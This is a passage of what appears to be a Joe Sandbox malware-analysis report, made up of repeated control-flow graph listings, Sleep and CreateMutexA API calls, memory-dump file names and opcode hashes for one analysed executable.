                                                                                                                                                                                                        • Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                        • Opcode ID: 746e1c3087c715aa5e530f9423d55667bc9b77aa5e9a415dee1c45ac6afd1fac
                                                                                                                                                                                                        • Instruction ID: 7850ce7299965e7537b710de4e0d463d30aa24bfd1b41c9518deb99fdc16562c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 746e1c3087c715aa5e530f9423d55667bc9b77aa5e9a415dee1c45ac6afd1fac
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A3179317102009BEB18AB78DD8C7EDB7A29FC6310F24823CF114AB6D6DBB599C18752

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 709 ba47d-ba49d 713 ba4cb-ba4e7 709->713 714 ba49f-ba4ab 709->714 717 ba4e9-ba4f5 713->717 718 ba515-ba534 713->718 715 ba4ad-ba4bb 714->715 716 ba4c1-ba4c8 call cd593 714->716 715->716 721 ba874-ba87e call e6b9a * 2 715->721 716->713 723 ba50b-ba512 call cd593 717->723 724 ba4f7-ba505 717->724 719 ba562-ba846 call c7f30 718->719 720 ba536-ba542 718->720 726 ba558-ba55f call cd593 720->726 727 ba544-ba552 720->727 740 ba883-ba8c4 Sleep CreateMutexA 721->740 741 ba87e call e6b9a 721->741 723->718 724->721 724->723 726->719 727->721 727->726 743 ba8d7-ba8d8 740->743 744 ba8c6-ba8c8 740->744 741->740 744->743 745 ba8ca-ba8d5 744->745 745->743
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 000BA893
                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,00113224), ref: 000BA8B1
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                        • Opcode ID: 03b921b1f477652ce244aeda6ee1840e83122d8a5926e10bb7979dcfee201b9c
                                                                                                                                                                                                        • Instruction ID: e224d4ac9db7166384dba4dbd0e97ab3db6d9659501663a49a0ee1562493da1f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 03b921b1f477652ce244aeda6ee1840e83122d8a5926e10bb7979dcfee201b9c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A3188317102009BEB18DB78DD8CBEDBB629FC6314F208328E014AB6D6DBB599818752

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 747 ba5b2-ba5d2 751 ba600-ba61c 747->751 752 ba5d4-ba5e0 747->752 755 ba64a-ba669 751->755 756 ba61e-ba62a 751->756 753 ba5e2-ba5f0 752->753 754 ba5f6-ba5fd call cd593 752->754 753->754 757 ba879-ba87e call e6b9a 753->757 754->751 761 ba66b-ba677 755->761 762 ba697-ba846 call c7f30 755->762 759 ba62c-ba63a 756->759 760 ba640-ba647 call cd593 756->760 775 ba883-ba8c4 Sleep CreateMutexA 757->775 776 ba87e call e6b9a 757->776 759->757 759->760 760->755 763 ba679-ba687 761->763 764 ba68d-ba694 call cd593 761->764 763->757 763->764 764->762 779 ba8d7-ba8d8 775->779 780 ba8c6-ba8c8 775->780 776->775 780->779 781 ba8ca-ba8d5 780->781 781->779
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 000BA893
                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,00113224), ref: 000BA8B1
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                        • Opcode ID: ef1332c97e055b3993031b80bc8c4a60a401f163118acc1a96448fe5aeefee7d
                                                                                                                                                                                                        • Instruction ID: 28b6af8f6d1fbb5e56f760051b2926900191693247c034272ec24e5cb0e120c5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ef1332c97e055b3993031b80bc8c4a60a401f163118acc1a96448fe5aeefee7d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 263159717102409BEB18DB78DD8CBEDB762DF8A310F24822CE014AB7D6DB7599818792

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 783 b9a0c-b9a18 784 b9a1a-b9a28 783->784 785 b9a2e-b9cc1 call cd593 call c7870 call b5b20 call b8a60 call c8150 call c7870 call b5b20 call b8a60 call c8150 783->785 784->785 786 ba847 784->786 788 ba883-ba8c4 Sleep CreateMutexA 786->788 789 ba847 call e6b9a 786->789 794 ba8d7-ba8d8 788->794 795 ba8c6-ba8c8 788->795 789->788 795->794 797 ba8ca-ba8d5 795->797 797->794
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 000BA893
                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,00113224), ref: 000BA8B1
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                        • Opcode ID: ae0c4e28f5141201a6ae2aa6beb75243c7e2dc6d6fd91a813ea647c8e30922fa
                                                                                                                                                                                                        • Instruction ID: 13a332d833d4c6e72ba4d9ac783a420cdf5434506d0a71272650842370e151c5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae0c4e28f5141201a6ae2aa6beb75243c7e2dc6d6fd91a813ea647c8e30922fa
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D22179317142009BEB18AF28DD8D7ECB6A2EF86310F20433DE5149BAD5DF7599818792
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 000BA893
                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,00113224), ref: 000BA8B1
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
